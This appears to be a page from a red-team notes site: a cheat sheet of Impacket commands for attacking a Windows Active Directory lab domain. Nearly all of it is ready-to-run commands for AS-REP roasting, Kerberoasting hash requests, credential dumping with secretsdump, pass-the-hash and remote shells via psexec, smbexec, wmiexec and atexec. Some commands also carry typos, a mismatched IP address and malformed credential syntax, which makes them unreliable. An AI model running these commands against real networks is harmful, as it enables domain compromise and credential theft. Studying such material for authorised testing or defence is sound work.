Impacket

Impacket is a collection of Python libraries and tools designed for working with network protocols, commonly used in penetration testing, red teaming, and post-exploitation. It supports a wide range of protocols such as SMB, TCP, UDP, HTTP, LDAP, and more, allowing users to craft, manipulate, and interact with network packets. Impacket includes tools for tasks like remote command execution, credential dumping, and SMB/NTLM operations, making it particularly useful for interacting with Windows networks. Its scriptable and extensible nature, along with its support for low-level protocol manipulation, makes Impacket a powerful tool for security professionals.

ASREP Roasting : Unprivileged accounts on the windows domain

impacket GetNPUsers.py GHOUL.com/ -dc-ip 192.168.0.10 -no-pass -usersfile /users.txt

Getting User account hashes with compromised SPN user on the AD

impacket GETUSERSPNs.py GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10

This will list the other SPN users on the windows AD and to get their hashes we will dump with the following command :

impacket GETUSERSPNs.py GHOUL.com/ghoul:"Hang@123" -dc-ip 192.168.0.10 -request

Impacket psexec

Once we crack the hashes of the priviledged accounts on the AD we will now try to gain the shell of the target machine using :

impacket-psexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10

to dump secrets of other users

impacket-secretsdump GHOUL.com/ghoul@"Hang@123"@192.16.0.10

after getting the full hash of the active accounts on the AD then we can log into any user accounts via providing hash directly

impacket-psexec GHOUL.com/ghoul@192.168.0.10 -hashes <hash:hash>

It is very important to check wheather the same account also exists on the local workgroup which can be known through :

impacket-psexec ghoul:"Hang@123"@192.168.0.10

Impacket-smbexec & Impacket-wmiexec

impacket-smbexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10

impacket-wmiexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10

Impacket-atexec : Directly pass commands on the targeted server

impacket-atexec GHOUL.com/ghoul:"Hang@123"@192.168.0.10 whomai

Lookup sid to list potenial users on the targeted domain

impacket-lookupsid GHOUL.com/ghoul:"Hang@123"@192.168.0.10

Services execution on the targeted domain

impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 --help

impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 list

impacket-services GHOUL.com/ghoul:"Hang@123"@192.168.0.10 start <service name>

SMBclient over Impacket

impacket-smbclient GHOUL.com/ghoul:"Hang@123"@192.168.0.10

for cracking hashes we can crack the hases using hashcat , The detailed overview of hashcat is given below :

Hashcat

PreviousCrackMapExec NextPowerview

Last updated 1 year ago

hashtagASREP Roasting : Unprivileged accounts on the windows domain

hashtagGetting User account hashes with compromised SPN user on the AD

hashtagImpacket psexec

hashtagImpacket-smbexec & Impacket-wmiexec

hashtagImpacket-atexec : Directly pass commands on the targeted server

hashtagLookup sid to list potenial users on the targeted domain

hashtagServices execution on the targeted domain

hashtagSMBclient over Impacket